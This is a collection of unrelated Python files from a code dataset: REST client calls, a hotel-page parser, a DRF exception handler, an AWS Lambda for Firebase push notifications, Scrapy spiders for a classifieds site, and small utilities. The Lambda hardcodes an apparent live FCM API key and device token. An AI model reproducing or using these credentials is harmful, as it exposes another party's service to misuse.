main()","sub_path":"hw1/task3.py","file_name":"task3.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"101528925","text":"#this program is only for when w e doct have postman\n\nimport requests\nimport json\n\nURL = \"http://localhost:8000/StudentApi/getStudentModel\"\n\n\ndef get_data(id=None):\n data = {}\n if id is not None:\n data = {'id': id}\n json_data = json.dumps(data)\n r = requests.get(url=URL, data=json_data)\n data = r.json()\n print(data)\n\n# get_data()\n\n\ndef post_data():\n data = {\n 'name': 'disha',\n 'roll': 30,\n 'city': 'surat'\n }\n json_data = json.dumps(data)\n r = requests.post(url=URL, data=json_data)\n data = r.json()\n print(data)\n\n#post_data()\n\n\ndef update_data():\n data = {\n 'id': 24,\n 'name': 'disha',\n 'roll': 31,\n }\n json_data = json.dumps(data)\n r = requests.put(url=URL, data=json_data)\n data = r.json()\n print(data)\n\nupdate_data()\n\n\ndef delete_data():\n data = {'id': 1}\n json_data = json.dumps(data)\n r = requests.delete(url=URL, data=json_data)\n data = r.json()\n print(data)\n\n\n#delete_data()\n","sub_path":"CRUDApi/ThirdPartyRequests.py","file_name":"ThirdPartyRequests.py","file_ext":"py","file_size_in_byte":1004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"439513387","text":"from frequency import geometric\nfrom signal_generator import makeSineSignal, writeSignalWav\nfrom numpy import arange\n\nif __name__ == \"__main__\":\n sampleRate = 44100.0\n x=arange(sampleRate)\n for i in range(0,11,1):\n freq = geometric(i)\n sign = makeSineSignal(freq, sampleRate, x, amplitude = 20000.0)\n writeSignalWav(sign, str(freq) + '.wav')\n\n","sub_path":"core/file_generator.py","file_name":"file_generator.py","file_ext":"py","file_size_in_byte":373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"450120912","text":"import numpy as np\r\nimport pandas as pd\r\nimport json\r\nimport datetime\r\n\r\nfrom copy import deepcopy\r\nfrom lxml import html, etree\r\nfrom scripts import dotw_config\r\nfrom scripts.core.logs import ParsingLogger\r\nfrom scripts.core.base import ParserBase, ParamParser\r\n\r\n\r\nclass DOTWLogger(ParsingLogger):\r\n NAME = 'dotw_parsing'\r\n\r\n\r\nDOTWLogger.set_logger()\r\nParamParser.DATA_TYPE = 'XPATH'\r\nParserBase.TRL = DOTWLogger\r\nParserBase.CONFIG_FILE = dotw_config\r\n\r\n\r\nclass Hotel(ParserBase):\r\n PROPERTIES = [\r\n ParamParser('address', 'hotel_data_html', ParserBase.CONFIG_FILE.Hotel__address, 'single_obj_array'),\r\n ParamParser('latitude', 'hotel_elem', ParserBase.CONFIG_FILE.Hotel__latitude, 'single_obj_array'),\r\n ParamParser('longitude', 'hotel_elem', ParserBase.CONFIG_FILE.Hotel__longitude, 'single_obj_array'),\r\n ]\r\n\r\n EXTRA_FIELDS = ['hotelName', 'website_id', 'starRating', 'city',\r\n 'index', 'total_hotel', 'page_path', 'supplier', 'city_zone']\r\n\r\n def __init__(self, parser_data):\r\n self.hotel_data_html = html.fromstring(parser_data['htmls']['hotelHTML']['html_element'])\r\n self.hotel_elem = html.fromstring(parser_data['htmls']['hotel_elem'])\r\n super().__init__(parser_data)\r\n\r\n @property\r\n def parsed__starRating(self):\r\n return self.hotel_elem.attrib['data-rate']\r\n\r\n @property\r\n def parsed__hotelName(self):\r\n return self.parser_data['hotelName']\r\n\r\n @property\r\n def parsed__website_id(self):\r\n return self.parser_data['hotel_id']\r\n\r\n 
@property\r\n def parsed__city(self):\r\n return self.parser_data['city']\r\n\r\n @property\r\n def parsed__index(self):\r\n return self.parser_data['index']\r\n\r\n @property\r\n def parsed__total_hotel(self):\r\n return self.parser_data['hotel_count']\r\n\r\n @property\r\n def parsed__pos(self):\r\n return self.parser_data['pos']\r\n\r\n @property\r\n def parsed__page_path(self):\r\n return self.parser_data['meta']['cachePageURL']\r\n\r\n @property\r\n def parsed__supplier(self):\r\n return 'dotwconnect'\r\n\r\n @property\r\n def parsed__city_zone(self):\r\n return self.parser_data['city_zone']\r\n\r\n\r\nclass RoomType(ParserBase):\r\n PROPERTIES = []\r\n\r\n EXTRA_FIELDS = ['room_types']\r\n\r\n def __init__(self, parser_data):\r\n self.room_type_html = html.fromstring(parser_data['roomTypes']['roomTypeHTML'])\r\n self.room_price_html = html.fromstring(parser_data['roomTypes']['priceHTML'])\r\n self.room_boardtype_html = html.fromstring(parser_data['roomTypes']['boardTypeHTML'])\r\n\r\n check_in = datetime.datetime.strptime(parser_data['checkIn'].split(' ')[0], '%Y-%m-%d')\r\n check_out = datetime.datetime.strptime(parser_data['checkOut'].split(' ')[0], '%Y-%m-%d')\r\n nights = check_out - check_in\r\n self.days = nights.days\r\n super().__init__(parser_data)\r\n\r\n def board_code_func(self, row):\r\n room_only = ['breakfast is available for a fee', 'breakfast excl', 'brkfast excl', 'no breakfast', 'offers on-site dining for breakfast at affordable prices', 'self-catering', \"room Only(includes 2 breakfasts)\", \"solo alojamiento(wi-fi Gratis)\", \"solo habitacion\", \"solo habitaci?n\", \"solo alojamiento con cocina\", \"solo alojamiento\", \"solo alojamiento(ro)\", \"room only\"]\r\n\r\n bed_brkfst = ['bed & breakfast', 'breakfast', 'english breakfast included', 'buffet breakfast', 'breakfast included', 'brkfast', 'cold breakfast', 'bed and breakfast', \"alojamiento y desayuno\", \"habitaci?n y desayuno\", \"habitacion y desayuno\", \"alojamiento y desayuno(wi-fi gratis)\", \"desayuno Buffet\", \"desayuno Buffet Fr?o\", \"desayuno continental\"]\r\n\r\n half_board = ['half board', 'breakfast and dinner', \"media pensi?n\", \"media pension\", \"media pensi?n(wi-fi gratis)\", \"media pension(wi-fi gratis)\"]\r\n\r\n full_board = ['full board', 'full board beverages included', \"pensi?n completa\", \"pension completa\"]\r\n\r\n all_incl = ['inclusive', \"todo incluido\"]\r\n\r\n others = ['other']\r\n\r\n for i in room_only:\r\n if i in row.lower():\r\n return 'RO', 'Room Only'\r\n\r\n for i in bed_brkfst:\r\n if i in row.lower():\r\n return 'BB', 'Bed and Breakfast'\r\n\r\n for i in half_board:\r\n if i in row.lower():\r\n return 'HB', 'Half Board'\r\n \r\n for i in full_board:\r\n if i in row.lower():\r\n return 'FB', 'Full Board'\r\n \r\n for i in all_incl:\r\n if i in row.lower():\r\n return 'AI', 'All Inclusive'\r\n \r\n for i in others:\r\n if i in row.lower():\r\n return 'OX', 'Others'\r\n\r\n def _get_promotions(self, board):\r\n \"\"\"\r\n process promotions for each room if any\r\n :param board: list of room elements for the hotel\r\n :return: list of promotion description and promotion status\r\n \"\"\"\r\n promo_status = []\r\n promo_desc_lst = []\r\n for i in board:\r\n val = i.xpath(ParserBase.CONFIG_FILE.RoomType__promotion)\r\n if len(val) > 0:\r\n promos = json.loads(val[0])[1]\r\n promo_desc = ''\r\n for k in promos.keys():\r\n if k.startswith('h'):\r\n promo_desc += promos[k]\r\n else:\r\n promo_status.append('Y')\r\n promo_desc_lst.append(promo_desc)\r\n else:\r\n 
promo_status.append('N')\r\n                promo_desc_lst.append('')\r\n\r\n        return promo_status, promo_desc_lst\r\n\r\n    @property\r\n    def parsed__room_types(self):\r\n        \"\"\"\r\n        :return:\r\n        \"\"\"\r\n        types = self.room_type_html.xpath(ParserBase.CONFIG_FILE.RoomType__type)\r\n\r\n        prices = [ i.attrib['data-roomformattedprice.1']\r\n                   for i in self.room_price_html.xpath(ParserBase.CONFIG_FILE.RoomType__price) ]\r\n\r\n        currency = [i.attrib['data-currency.1']\r\n                    for i in self.room_price_html.xpath(ParserBase.CONFIG_FILE.RoomType__currency)]\r\n\r\n        boards = self.room_boardtype_html.xpath(ParserBase.CONFIG_FILE.RoomType__boardType)\r\n\r\n        payload = dict()\r\n        payload['type'] = [i.strip() for i in types if len(i.strip()) > 0]\r\n        payload['price'] = [i.strip() for i in prices if len(i.strip()) > 0]\r\n        payload['boardType'] = [i.strip() for i in boards if len(i.strip()) > 0]\r\n        payload['currency'] = [i.strip() for i in currency if len(i.strip()) > 0]\r\n\r\n        board = deepcopy(self.room_type_html.xpath(ParserBase.CONFIG_FILE.RoomType__board))\r\n        payload['promotion'], payload['promotionDesc'] = self._get_promotions(board)\r\n\r\n        room_df = pd.DataFrame(payload, columns=list(payload.keys()))\r\n        room_df['board_code'], room_df['board_name'] = zip(*room_df['boardType'].apply(self.board_code_func))\r\n        days = self.days\r\n        room_df['price'] = room_df['price'].str.replace(',', '')\r\n        room_df['price'] = np.array(room_df['price'], dtype='str').astype(float)  # np.float was removed from NumPy; the builtin float is equivalent\r\n        room_df['daily_price'] = room_df['price'].apply(lambda row: row / days)\r\n        room_df['direct_payment'] = 'N'\r\n        room_details = room_df.T.to_dict()\r\n\r\n        return list(room_details.values())\r\n\r\n\r\ndef crawl_hotels(parser_data):\r\n    \"\"\"\r\n    :param parser_data:\r\n    :return:\r\n    \"\"\"\r\n    # from pdb import set_trace; set_trace()\r\n    response = parser_data.copy()\r\n    # response['hotels'] = [crawl_hotel(hotel_data) for hotel_data in parser_data['hotels']]\r\n    response['hotel'] = crawl_hotel(parser_data['hotel'])\r\n    return response\r\n\r\n\r\ndef crawl_hotel(hotel_data):\r\n    hotel_meta = hotel_data['meta'].copy()\r\n    hotel_payload = Hotel(hotel_data).complete_parsed_values\r\n    room_types_payload = RoomType(hotel_data).complete_parsed_values\r\n    mongo_data = dict()\r\n    mongo_data.update(hotel_payload)\r\n    mongo_data.update(room_types_payload)\r\n    mongo_data.update({'meta': hotel_meta})\r\n    return mongo_data\r\n","sub_path":"eCube_Hotel_2/HotelMessaging/AetosParsingService/scripts/ParserDOTWPython.py","file_name":"ParserDOTWPython.py","file_ext":"py","file_size_in_byte":8054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"530750758","text":"# Custom exception handler\nfrom rest_framework.response import Response\nfrom rest_framework.views import exception_handler as drf_exception_handler\nfrom rest_framework import status\ndef exception_handler(exc,context):\n    # print(exc,'01010101',context)\n\n    # Build the detailed error message\n    error=\"%s %s %s\"%(context['view'],context['request'].method,exc)\n    print(error)\n\n    # Let DRF handle the exception first; only when DRF cannot handle it (returns None) fall back to this custom handling\n    response=drf_exception_handler(exc,context)\n    if response is None:\n        return Response(\n            {'error_msg':'The program hit an error, please try again in a moment'},\n            status=status.HTTP_500_INTERNAL_SERVER_ERROR,exception=None\n        )\n    # return Response({'error_msg':error}) # error replaces the original response content\n    # The response is not None, so DRF has already handled the exception\n    return None","sub_path":"utils/exceptions.py","file_name":"exceptions.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
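# [Editor's aside -- minimal sketch, not from the original record: a custom DRF
# handler like the utils/exceptions.py record above only takes effect once it
# is declared in Django settings. The dotted path matches that record's
# sub_path; adjust it to your own project layout.]
REST_FRAMEWORK = {
    'EXCEPTION_HANDLER': 'utils.exceptions.exception_handler',
}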
+{"seq_id":"602837240","text":"import boto3\nimport json\nimport datetime\nfrom datetime import date, timedelta\nfrom pyfcm import FCMNotification\n\ns3_client = boto3.client('s3')\ns3_resource = boto3.resource('s3')\ncolors_bucket_name=\"rgb-colors\"\n\ndef get_color_values_from_bucket():\n colors_file_path = \"colors.json\" # filepath == key\n \n yesterday = date.today() - timedelta(days=1)\n yesterday = yesterday.strftime('%Y-%m-%d')\n \n print(yesterday)\n \n for obj in s3_client.list_objects_v2(Bucket=colors_bucket_name)[\"Contents\"]:\n if (\"colors-\" + yesterday) in obj[\"Key\"]:\n colors_file_path = obj[\"Key\"]\n break\n \n print(colors_file_path)\n \n obj = s3_resource.Object(colors_bucket_name, colors_file_path)\n \n colors = json.load(obj.get()['Body'])\n \n return colors\n\ndef load_registration_ids():\n colors_bucket_name = \"rgb-device-data\"\n colors_file_path = \"registration-ids.json\"\n \n obj = s3_resource.Object(colors_bucket_name, colors_file_path)\n \n registration_ids_list = json.load(obj.get()['Body'])\n\n return registration_ids_list\n\ndef lambda_handler(event, context):\n push_service = FCMNotification(api_key=\"AAAAAep1hT0:APA91bFwPzY_2h94K5CJSZGpfaubJVroCTXQwqMAAqxLGtzZYw3tLwuUmc3hTxqasr8JqpAsU4z4hc-6wOZESP4KWblgWTSEFb8qi-qVjsor_EbrSpKInGh51A1rPCTXPX543xeBGv7J\")\n \n registration_id = \"c9gvODnd0zs:APA91bEJ3NWj7vJ3dU-Vvk0VYNeqXLhR1pBLJ9FNOaCBa6IC-7q59rj7E-fEbM0NysbFCSpzWlZSsHsGBkTcKAREsBZqVZ_lnex9zwrFGx5FHtpiaEikGekZnj5_LNaIX_2CXscKjqGs\"\n \n try:\n print(event)\n message_title = event[\"Records\"][0][\"Sns\"][\"Message\"]\n message_body=\"\"\n except:\n colors = get_color_values_from_bucket()\n message_title = \"Colors yesterday\"\n message_body = \"Red: \" + str(colors[\"red\"]) + \" Green: \" + str(colors[\"green\"]) + \" Blue: \" + str(colors[\"blue\"])\n \n registration_ids = load_registration_ids()\n \n for registration_id in registration_ids:\n result = push_service.notify_single_device(registration_id=registration_id, message_title=message_title,\n message_body=message_body)\n\n return {\n 'statusCode': 200,\n 'body': json.dumps('Push notification sent')\n }","sub_path":"Lambda/push_notifications.py","file_name":"push_notifications.py","file_ext":"py","file_size_in_byte":2249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"496040275","text":"class BSTIterator:\n\n def __init__(self, root):\n self.stack = []\n node = root\n while node:\n self.stack.append(node)\n node = node.left\n \n def next(self) -> int:\n \"\"\"\n @return the next smallest number\n \"\"\"\n node = self.stack.pop()\n x = node.right\n while x:\n self.stack.append(x)\n x = x.left\n return node.val\n \n\n def hasNext(self) -> bool:\n \"\"\"\n @return whether we have a next smallest number\n \"\"\"\n return len(self.stack) > 0","sub_path":"medium/test_173.py","file_name":"test_173.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"52301190","text":"#Duplicate_By_week\r\nimport pandas as pd\r\nimport numpy as np, os,glob\r\n\r\n\r\n#memory efficient banana h\r\ndf_Final = pd.DataFrame()\r\nfor file in glob.iglob(os.path.join(os.path.expanduser('~'),'Downloads\\MBI Analysis\\Consolidated\\*.xlsx')):\r\n df = pd.read_excel(file,sheet_name='Sheet1',header=0)\r\n df['MBI #'] = df['MBI #'].astype(str).str.strip(\" \")\r\n df= df[df.duplicated(['MBI #'], keep=False)] \r\n filename=os.path.basename(file)\r\n 
name=os.path.splitext(filename)[0]\r\n df['Week'] = name\r\n df_Final=df_Final.append(df)\r\n del df\r\ndf_Final[\"MBI #\"] = df_Final[\"MBI #\"].replace(\"nan\",\"\") \r\ndf_Final.to_csv(\"C:\\\\Users\\\\rrathi\\\\Downloads\\\\MBI Analysis\\\\Duplicate_By_week.csv\", encoding='utf-8', index=False )\r\n\r\n\r\ndel df_Final","sub_path":"Duplicate by week.py","file_name":"Duplicate by week.py","file_ext":"py","file_size_in_byte":746,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"651105435","text":"import scrapy\nimport pdb\nfrom babel.items import *\nfrom datetime import datetime \nimport re\nimport unicodedata\n\n# validate the value of html node\n# return string value, if data is validated\n# return \"\", otherwise\ndef validate(node):\n if len(node) > 0:\n value = node.extract_first().strip()\n return value\n else: \n return \"\"\n\n#convert date format\ndef correct_date(ori_date):\n if ori_date == \"\":\n return \"\"\n return datetime.strptime(ori_date, '%B %d, %Y %I:%M %p').strftime('%Y-%m-%d %H:%M:%S')\n\n#Get Price from str\ndef extract_price(pri_str):\n return pri_str.split(\" \", 1)[-1]\n\n#Initialize BaseItem Class\ndef init_base_item(item):\n item[\"category_id\"] = item[\"category\"] = item[\"item_type\"] = item[\"title\"] = item[\"post_date\"] = item[\"price\"] = item[\"details\"] = item[\"contact_name\"] = item[\"contact_email\"] = item[\"expiration_date\"] = \"\"\n item[\"image_urls\"] = item[\"image_names\"] = item[\"images\"] = [] \n\nclass KhaleejcarsSpider(scrapy.Spider):\n #name of the spider\n name = \"khaleejcars\"\n\n #list of allowed domains\n allowed_domains = [\"buzzon.khaleejtimes.com\"]\n \n #list of urls\n start_urls = [\n \"http://buzzon.khaleejtimes.com/ad-category/used-cars/\",\n ]\n\n #domain url\n domain = \"http://buzzon.khaleejtimes.com\"\n\n def parse(self, response):\n total_num = validate(response.xpath('.//h1[@class=\"single dotted\"]/text()'))\n total_num = unicodedata.normalize('NFKD', total_num).encode('ascii','ignore')\n total_num = int(filter(str.isdigit, total_num))\n page_num = total_num / 15\n if total_num % 15 != 0:\n page_num += 1 \n for page in range(1, page_num):\n url = \"http://buzzon.khaleejtimes.com/ad-category/used-cars/page/%s/\" % page\n request = scrapy.Request(url, callback=self.parse_each_page)\n request.meta[\"page\"]=page\n yield request\n\n #parse main car list\n #get the make and made info for each car\n def parse_each_page(self, response):\n page = response.meta[\"page\"]\n for car in response.xpath('//div[@class=\"content_left\"]//div[contains(@class, \"post-block-out \")]'):\n car_detail_url = validate(car.xpath('.//a/@href'))\n request = scrapy.Request(car_detail_url, callback=self.parse_car_detail)\n yield request\n\n #parse car detail\n #get the detail info for each car\n def parse_car_detail(self, response):\n car = self.init_car()\n car[\"category\"] = \"Cars\"\n car[\"item_type\"] = \"car\"\n car[\"title\"] = validate(response.xpath('//h1[@class=\"single-listing\"]/a/text()'))\n car[\"make\"] = validate(response.xpath('//li[@id=\"cp_car_brand\"]/text()'))\n car[\"model\"] = validate(response.xpath('//li[@id=\"cp_model\"]/text()'))\n car[\"price\"] = extract_price(validate(response.xpath('//p[@class=\"post-price\"]/text()')))\n car[\"year\"] = validate(response.xpath('//li[@id=\"cp_year\"]/text()'))\n car[\"body_style\"] = validate(response.xpath('//li[@id=\"cp_body_style\"]/text()'))\n car[\"seller\"] = 
validate(response.xpath('//li[@id=\"cp_seller_type\"]/text()'))\n car[\"doors\"] = validate(response.xpath('//li[@id=\"cp_doors\"]/text()'))\n car[\"color\"] = validate(response.xpath('//li[@id=\"cp_color\"]/text()'))\n car[\"mileage\"] = validate(response.xpath('//li[@id=\"cp_mileage\"]/text()'))\n car[\"warranty\"] = validate(response.xpath('//li[@id=\"cp_warranty\"]/text()'))\n car[\"contact_number\"] = validate(response.xpath('//li[@id=\"cp_contact_no\"]/text()'))\n car[\"contact_email\"] = validate(response.xpath('//li[@id=\"cp_email_address\"]/a/text()'))\n car[\"mileage\"] = validate(response.xpath('//li[@id=\"cp_mileage\"]/text()'))\n car[\"post_date\"] = correct_date(validate(response.xpath('//li[@id=\"cp_listed\"]/text()')))\n car[\"expiration_date\"] = validate(response.xpath('//li[@id=\"cp_expires\"]/text()'))\n car[\"image_urls\"] = response.xpath('//div[@class=\"bigleft\"]//img/@src').extract()\n car[\"details\"] = \" \".join(response.xpath('//div[@class=\"single-main\"]//p/text()').extract())\n num = 0\n return car\n\n def init_car(self):\n car = Car() \n init_base_item(car)\n car[\"title\"] = car[\"make\"] = car[\"model\"] = car[\"year\"] = car[\"drive_train\"] = car[\"seller\"] = car[\"price\"] = car[\"post_date\"] = car[\"body_style\"] = car[\"mileage\"] = car[\"transmission\"] = car[\"fuel_type\"] = car[\"cylinders\"] = car[\"doors\"] = car[\"ext_color\"] = car[\"int_color\"] = car[\"vin\"] = car[\"warranty\"] = car[\"color\"] = \"\"\n car[\"category_id\"] = \"31\"\n car[\"image_urls\"] = car[\"image_names\"] = car[\"images\"] = []\n car[\"region\"] = \"\"\n return car\n\n def get_transmission(self, trans_str):\n if trans_str.upper().startswith('A'):\n return \"AUTO\"\n return \"MANUAL\"\n \n def get_fuel_type(self, fuel_type_str):\n if fuel_type_str.upper().startswith('D'):\n return 'DIESEL'\n elif (fuel_type_str.upper().startswith('G') or fuel_type_str.upper().startswith('P')):\n return 'GASOLINE'\n elif fuel_type_str.upper().startswith('E'):\n return 'ELECTRIC-HYBRID'\n else:\n return 'OTH'\n \n def get_warranty(self, warranty_str):\n if str != \"\":\n return 1\n return 0\n\nclass KhaleejjobsSpider(scrapy.Spider):\n #name of the spider\n name = \"khaleejjobs\"\n\n #list of allowed domains\n allowed_domains = [\"buzzon.khaleejtimes.com\"]\n \n #list of urls\n start_urls = [\n \"http://buzzon.khaleejtimes.com/ad-category/jobs-vacancies/\",\n ]\n \n #domain url\n domain = \"buzzon.khaleejtimes.com\"\n \n def parse(self, response):\n total_num = validate(response.xpath('.//h1[@class=\"single dotted\"]/text()'))\n total_num = unicodedata.normalize('NFKD', total_num).encode('ascii','ignore')\n total_num = int(filter(str.isdigit, total_num))\n page_num = total_num / 15\n if total_num % 15 != 0:\n page_num += 1 \n for page in range(1, page_num):\n url = \"http://buzzon.khaleejtimes.com/ad-category/jobs-vacancies/page/%s/\" % page\n request = scrapy.Request(url, callback=self.parse_each_page)\n request.meta[\"page\"]=page\n yield request\n\n #parse main car list\n #get the make and made info for each car\n def parse_each_page(self, response):\n page = response.meta[\"page\"]\n for job in response.xpath('//div[@class=\"content_left\"]//div[contains(@class, \"post-block-out \")]'):\n job_detail_url = validate(job.xpath('.//a/@href'))\n request = scrapy.Request(job_detail_url, callback=self.parse_job_detail)\n yield request\n\n def parse_job_detail(self, response):\n job = self.init_job()\n job[\"category\"] = map((lambda 
x:x.strip()),response.xpath('//div[@itemprop=\"breadcrumb\"]//a//text()').extract())[-1]\n job[\"title\"] = validate(response.xpath('//h1[@class=\"single-listing\"]/a/text()'))\n job[\"post_date\"] = correct_date(validate(response.xpath('//li[@id=\"cp_listed\"]/text()')))\n job[\"details\"] = \" \".join(response.xpath('//div[@class=\"single-main\"]//p/text()').extract())\n job[\"image_urls\"] = response.xpath('//div[@class=\"bigleft\"]//img/@src').extract()\n job[\"contact_email\"] = validate(response.xpath('//li[@id=\"cp_email_address\"]/a/text()'))\n job[\"expiration_date\"] = validate(response.xpath('//li[@id=\"cp_expires\"]/text()'))\n\n job[\"name\"] = validate(response.xpath('//li[@id=\"cp_industry\"]/text()'))\n job[\"job_type\"] = validate(response.xpath('//li[@id=\"cp_career\"]/text()'))\n job[\"status\"] = validate(response.xpath('//li[@id=\"cp_job_type\"]/text()'))\n job[\"salary\"] = validate(response.xpath('//li[@id=\"cp_salary\"]/text()'))\n job[\"location\"] = validate(response.xpath('//li[@id=\"cp_job_location\"]/text()'))\n job[\"code\"] = \"\"\n return job\n\n def init_job(self):\n job = Job()\n init_base_item(job)\n job[\"item_type\"] = \"job\"\n job[\"title\"] = job[\"name\"] = job[\"post_date\"] = job[\"job_type\"] = job[\"status\"] = job[\"category\"] = job[\"salary\"] = job[\"price\"] = job[\"details\"] = \"\"\n job[\"category_id\"] = \"3\"\n job[\"e_relation\"] = \"LOOKING\"\n job[\"fk_c_locale_code\"] = \"en_US\"\n job[\"image_urls\"] = job[\"image_names\"] = job[\"images\"] = []\n job[\"s_desired_exp\"] = job[\"s_studies\"] = job[\"s_minimum_requirements\"] = job[\"s_desired_requirements\"] = job[\"s_contract\"] = job[\"s_company_description\"] = \"\" \n job[\"region\"] = \"\"\n return job\n\nclass KhaleejpropertySpider(scrapy.Spider):\n #name of the spider\n name = \"khaleejproperty\"\n\n #list of allowed domains\n allowed_domains = [\"buzzon.khaleejtimes.com\"]\n \n #list of urls\n start_urls = [\n \"http://buzzon.khaleejtimes.com/ad-category/real-estate/\",\n ]\n \n #domain url\n domain = \"http://buzzon.khaleejtimes.com/\"\n\n def parse(self, response):\n total_num = validate(response.xpath('.//h1[@class=\"single dotted\"]/text()'))\n total_num = unicodedata.normalize('NFKD', total_num).encode('ascii','ignore')\n total_num = int(filter(str.isdigit, total_num))\n page_num = total_num / 15\n if total_num % 15 != 0:\n page_num += 1 \n for page in range(1, page_num):\n url = \"http://buzzon.khaleejtimes.com/ad-category/real-estate/page/%s/\" % page\n request = scrapy.Request(url, callback=self.parse_each_page)\n request.meta[\"page\"]=page\n yield request\n\n #parse main car list\n #get the make and made info for each car\n def parse_each_page(self, response):\n page = response.meta[\"page\"]\n for house in response.xpath('//div[@class=\"content_left\"]//div[contains(@class, \"post-block-out \")]'):\n house_detail_url = validate(house.xpath('.//a/@href'))\n request = scrapy.Request(house_detail_url, callback=self.parse_house_detail)\n yield request\n\n def parse_house_detail(self, response):\n house = self.init_house()\n category = map((lambda x:x.strip()),response.xpath('//div[@itemprop=\"breadcrumb\"]//a//text()').extract())[-1]\n house[\"category\"] = category\n house[\"item_type\"] = \"house\"\n house[\"title\"] = validate(response.xpath('//h1[@class=\"single-listing\"]/a/text()'))\n house[\"post_date\"] = correct_date(validate(response.xpath('//li[@id=\"cp_listed\"]/text()')))\n house[\"price\"] = 
extract_price(validate(response.xpath('//p[@class=\"post-price\"]/text()')))\n house[\"details\"] = \" \".join(response.xpath('//div[@class=\"single-main\"]//p/text()').extract())\n house[\"contact_name\"] = \"\"\n house[\"contact_email\"] = validate(response.xpath('//li[@id=\"cp_email_address\"]/text()'))\n house[\"image_urls\"] = response.xpath('//div[@class=\"bigleft\"]//img/@src').extract()\n \n house[\"name\"] = \"\"\n house[\"yearly_rent\"] = \"\"\n house[\"plot_size\"] = \"\"\n house[\"sub_community\"] = validate(response.xpath('//li[@id=\"cp_city\"]/text()'))\n house[\"parking\"] = validate(response.xpath('//li[@id=\"cp_parking\"]/text()')).split(\" \")[0]\n house[\"reference_number\"] = \"\"\n house[\"bedroom\"] = validate(response.xpath('//li[@id=\"cp_bedrooms\"]/text()')).split(\" \")[0]\n house[\"full_baths\"] = validate(response.xpath('//li[@id=\"cp_bathroom\"]/text()'))\n house[\"square_feet\"] = validate(response.xpath('//li[@id=\"cp_area_in_sq_ft\"]/text()'))\n house[\"region\"] = \"\"\n return house\n\n def init_house(self):\n house = House()\n init_base_item(house)\n house[\"name\"] = house[\"yearly_rent\"] = house[\"post_date\"] = house[\"plot_size\"] = house[\"sub_community\"] = house[\"reference_number\"] = house[\"bedroom\"] = house[\"square_feet\"] = house[\"parking\"] = \"\"\n return house\n\n\nclass KhaleejclassifiedsSpider(scrapy.Spider):\n #name of the spider\n name = \"khaleejclassifieds\"\n\n #list of allowed domains\n allowed_domains = [\"buzzon.khaleejtimes.com\"]\n \n #list of urls\n start_urls = [\n \"http://buzzon.khaleejtimes.com/categories/\",\n ]\n \n #domain url\n domain = \"http://buzzon.khaleejtimes.com/\"\n\n def parse(self, response):\n for each_category_url in response.xpath('//div[@id=\"directory\"]//a/@href').extract():\n request = scrapy.Request(each_category_url, callback=self.parse_each_category)\n yield request\n\n def parse_each_category(self, response):\n total_num = validate(response.xpath('.//h1[@class=\"single dotted\"]/text()'))\n total_num = unicodedata.normalize('NFKD', total_num).encode('ascii','ignore')\n total_num = int(filter(str.isdigit, total_num))\n page_num = total_num / 15\n if total_num % 15 != 0:\n page_num += 1 \n for page in range(1, page_num):\n url = \"%spage/%s/\" % (response.url, page)\n request = scrapy.Request(url, callback=self.parse_each_page)\n request.meta[\"page\"]=page\n yield request\n\n #parse main car list\n #get the make and made info for each car\n def parse_each_page(self, response):\n page = response.meta[\"page\"]\n for classified in response.xpath('//div[@class=\"content_left\"]//div[contains(@class, \"post-block-out \")]'):\n classified_detail_url = validate(classified.xpath('.//a/@href'))\n request = scrapy.Request(classified_detail_url, callback=self.parse_classified_detail)\n yield request\n\n def parse_classified_detail(self, response):\n classified = self.init_classified()\n classified[\"category_id\"] = \"\"\n classified[\"category\"] = map((lambda x:x.strip()),response.xpath('//div[@itemprop=\"breadcrumb\"]//a//text()').extract())[1]\n classified[\"item_type\"] = \"classifieds\"\n classified[\"title\"] = validate(response.xpath('//h1[@class=\"single-listing\"]/a/text()'))\n classified[\"post_date\"] = correct_date(validate(response.xpath('//li[@id=\"cp_listed\"]/text()')))\n classified[\"price\"] = extract_price(validate(response.xpath('//p[@class=\"post-price\"]/text()')))\n classified[\"details\"] = \" \".join(response.xpath('//div[@class=\"single-main\"]//p/text()').extract())\n 
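# [Editor's aside -- illustrative, not from this spider: the repeated
# "page_num = total_num / 15, then +1 on remainder" blocks implement ceiling
# division (this is Python-2 era code, where int / int truncates). A compact
# equivalent is below. One caveat worth noting: range(1, page_num) stops at
# page_num - 1, so as written the spiders never request the final page.]
def pages_needed(total_items, per_page=15):
    return -(-total_items // per_page)   # ceiling division without math.ceil

print(pages_needed(31))   # 3
print(pages_needed(30))   # 2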
classified[\"image_urls\"] = response.xpath('//div[@class=\"bigleft\"]//img/@src').extract()\n classified[\"contact_name\"] = \"\"\n classified[\"contact_email\"] = validate(response.xpath('//li[@id=\"cp_email_address\"]/text()'))\n\n classified[\"location\"] = validate(response.xpath('//li[@id=\"cp_job_location\"]/text()'))\n classified[\"contact\"] = \"\"\n return classified\n\n def init_classified(self):\n classified = Classified()\n init_base_item(classified)\n classified[\"title\"] = classified[\"location\"] = classified[\"category\"] = classified[\"post_date\"] = classified[\"contact\"] = \"\"\n classified[\"image_urls\"] = classified[\"images\"] = []\n classified[\"region\"] = \"\"\n return classified","sub_path":"babel/spiders/khaleej_spider.py","file_name":"khaleej_spider.py","file_ext":"py","file_size_in_byte":14065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"407463976","text":"import os\r\n\r\n#Change the baseline variable to the directory of the client \r\nbaseline = 'C:/Daniel/apps/ColeParmer/test_data/'\r\n\r\noutfile = baseline+'datasizes.out'\r\n\r\ndef getDataFiles(baseline):\r\n #Creates output file\r\n ofile = open(outfile,'w')\r\n ofile.write('This script will output the line count of each data file at a 75% threshold for the data size check.\\n\\n')\r\n ofile.close()\r\n #Iterates through the ../test_data/baseline directory to grab all the data 